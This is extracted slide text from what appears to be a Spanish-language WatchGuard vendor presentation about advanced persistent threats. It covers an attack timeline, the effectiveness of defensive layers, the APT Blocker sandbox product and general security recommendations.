  • 16. La confianza es la mejor conexión Línea de tiempo de las Amenazas GhostNet Operation Aurora Stuxnet RSA/Lockheed Duqu Flame Gauss NYTimes Adobe Target Mar. 2009 Jan. 2010 Jun. 2010 Mar. 2011 Sep.2 011 May 2012 Dec. 2013 Jun. 2012 Jan. 2013 2009 2010 2011 2012 2013 2014 Oct. 2013 China-based C&C Spear Phishing Political Targets IE 0day Comment Crew (CN) Stole Gmail and Src Four 0day PLC Rootkit Broke Centrifuges 0day Flash Flaw 0dayTrojan Stole SecureID Info 0day Word flaw Iran, Sudan, Syrian Cyber Espionage 0day MS Cert Flaw Stole IP Target Iranian Oil Targeted Lebanon USB LNK Flaw APT Bank Trojan 152M records 0day Coldfusion Stolen source China-based Spear phishing 0day malware 40M CCNs 0day malware Partner access Nacion-Estado / Politica Criminales / Privadas
  • 17. La confianza es la mejor conexión CADENA COMPLETA DEL APT
  • 18. La confianza es la mejor conexión
  • 19. La confianza es la mejor conexión Las Técnicas de APT ahora atacan el SMB Zeus copia los ataques Stuxnet 0 day Criminales usan 0day malware (Cryptolocker) Zeus usa Certificados Robados Criminales spear phishing Criminales con Ataques watering hole Ahora, los criminals del malware exploits las mismas tacticas avanzadas que los que Ataque de Estado. Cada organizacion esta en riesgo de los APT!
  • 20. La confianza es la mejor conexión HERRAMIENTAS COMERCIALES PARA HACKING Y PHISHING
  • 21. La confianza es la mejor conexión Software Evasión Dinámica • Dynamic Evasion • Checks for Environment • Tool Kits Available for Download Defeats sandbox and virtual machines Fireware 11.9
  • 22. La confianza es la mejor conexión PORQUE ATACAR LA SMB GRAN EMPRESA $$$$ SMB $
  • 23. La confianza es la mejor conexión “ MENOS DEL 1% DE LOS EMPLEADOS MANTIENEN CONDUCTAS MALICIOSAS O TRATAN DE ATACAR LA EMPRESA.PERO EL 100% DE LOS EMPLEADOS PUEDEN SER COMPROMETIDOS SIN DARSE CUENTA PARA ATACAR LA EMPRESA” ¨”El Hacker puede aprovechar cualquier info de las Redes Sociales”
  • 24. La confianza es la mejor conexión CARACTERISTICAS PRINCIPALES DE UN APT 24 • Amenaza dedicada a blanco especifico • Utiliza técnicas sofisticadas • Comunicaciones Cifradas. • Se puede transmitir USB • Usa Puertos 80,443,53 • Ingeniería social • Vulnerabilidades de día cero • Certificados fraudulentos • Mando y Control Centralizado • Sin ser detectados durante períodos prolongados • Enmascaramiento exfiltración
  • 25. La confianza es la mejor conexión Fuentes Generadoras de APT
  • 26. La confianza es la mejor conexión Estrategia de defensa en Profundidad Algunas alternativas incluyen la mitigacion del riesgo basados en capas de seguridad y control de Parches; Las Apt y los Ataques de dia Cero pueden Sobrepasar las capas. Administraciòn de Parches Control de vulnerabilidades Proactivo Control de Aplicaciones Y Proxys Control Gris Control Dispositivos Y navegación Control del flujo AV/IPs Control Conocido Cifrado de media y Disco Control de Datos
  • 27. La confianza es la mejor conexión Efectividad del AV e IPs? Pros: • Detiene “background noise” malware • Puede detectar código reutilizado ( baja probabilidad ) • Podria detener payloads despues de ser descubiertos Cons: • No es una defense Proactiva ante las APT • Evade la Euristica mediante encripció y enmascaramiento de operaciones en tiempo. • La Heuristica Dinámica es de alto desempeño y baja tasa de detecciòn. Av/ips Control the Known
  • 28. La confianza es la mejor conexión Efectividad Device Control Y Navegacion (Control WEB y Reputación) Device Control y Navegacion Control the Flow Pros: • Puede evitar que los dispositivos no autorizados o las descargas inyectan malware. • Puede parar determinados tipos de archivos se copien en máquinas host • Método preventivo. Cons: • Siempre hay un host que esta expuesto por excepción de políticas Ataque lateral.
  • 29. La confianza es la mejor conexión Efectividad del cifrado? Cifrado de Media y Disco Duro Control the Data Pros: • Hace adquisición de datos lateral más difícil • Una buena capa de protección de datos fuera de la APT Cons: • Generalmente no protegerá los datos si el punto final se ve comprometida a nivel de sistema
  • 30. La confianza es la mejor conexión Efectividad del Control de Aplicaciones y Proxys Control de Aplicaciones y Proxys DPI Control the Grey Pros: • Extremadamente eficaz contra los ataques de día cero • Detiene desconocidos , cargas útiles de malware dirigidos • Impacto bajo rendimiento en los puntos finales Cons: • A medida que la flexibilidad de las política se incrementa deja de ser efectivo. • No detiene inyecciones en memoria ( ataques que no escapan a la memoria de servicio)
  • 31. La confianza es la mejor conexión Efectividad de Administración Parches Administracion de Parches Control the Vulnerability Landscape Pros: • Elimina la superficie atacable que los hackers pueden dirigir • Configuración central de cortafuegos de escritorio nativas • Mejora el rendimiento de punto final y la estabilidad • Se puede activar la protección de la inyección de memoria nativa Cons: • No detiene ataques de día Cero
  • 32. La confianza es la mejor conexión Curva de Ataques de Dia Cero AV/IPS OS / ApplicationSandBox Malware And Virus Detection
  • 33. La confianza es la mejor conexión APT Blocker Best of Breed Partner - Lastline Fundada en 2011 Dir Redwood City, CA 8 años de investigación. Fireware 11.9 • Emulador de codigo mediante sandbox en la Nube. • Emulacion de Sistema incluyendo actividad de Hardware • Detecta malware Dia 0 • Inspecciona Millones de codigo en un instante • Puede detector técnicas de Evasion
  • 34. La confianza es la mejor conexión Malware (R)evolution Simple Threats OpportunisticAttacks APT Solutions Antivirus Solutions TargetedAttacks Packing Sophisticated Threats Plain Virus Poly- morphic C&C Fluxing Persistent Threats Evasive Threats Fireware 11.9
  • 35. La confianza es la mejor conexión APT Blocker – Analisis de Malware en HD Ejecución y emulación de código Instrucciones de CPU Individuales Memory accesses System calls Detección de Evasion Provee granularidad y precisión que excede A la competencia Fireware 11.9
  • 36. La confianza es la mejor conexión Windows XP and Windows 7 • All Windows Executable Files • MS Word • Excel • PowerPoint • PDF Android • APK APT Blocker Fireware 11.9
  • 37. La confianza es la mejor conexión APTBlock er Cache Local “Cache” Remoto Carga Archivo APT Blocker Fireware 11.9
  • 38. La confianza es la mejor conexión WatchGuard Dimension Visibilidad 38 Advanced Malware in Security Dashboard Fireware 11.9
  • 39. La confianza es la mejor conexión Reports in WatchGuard Dimension 39 Fireware 11.9
  • 40. La confianza es la mejor conexión Visibility Explains Why This Is Malware 40 Drill down to find why the activity is determined to be malware Fireware 11.9
  • 41. La confianza es la mejor conexión Security Dashboard • Blocked Clients • Blocked Destinations • Blocked URL Categories • Blocked Applications • Blocked Protocols • Blocked Intrusions • Blocked Viruses
  • 42. La confianza es la mejor conexión Threat Map
  • 43. La confianza es la mejor conexión “Más del 95% de las vulnerabilidades de los firewall son causadas por mala configuración de los mismos, no por defectos de los equipos” -Gartner, 2011
  • 44. La confianza es la mejor conexión RECOMENDACIONES DE SEGURIDAD • Establecer Políticas de seguridad y control de acceso. • Establecer sitios de contingencia y backups • Establecer un plan de desastres y recuperación • Actualizar firmas y parches • No dejar abiertos servicios innecesarios • Contar con tecnología apropiada • Escaneo de Https • Uso de diferentes capas de seguridad que cierren el vector de ataque. • Estar actualizado sobre nuevas amenazas • Educar a los usuarios en materia de seguridad • Poseer un plan de seguridad • No ver los sistemas de seguridad como cajas negras. • Tener Herramientas de visibilidad y correlación de trafico en forma grafica.
  • 45. La confianza es la mejor conexión Gracias !!!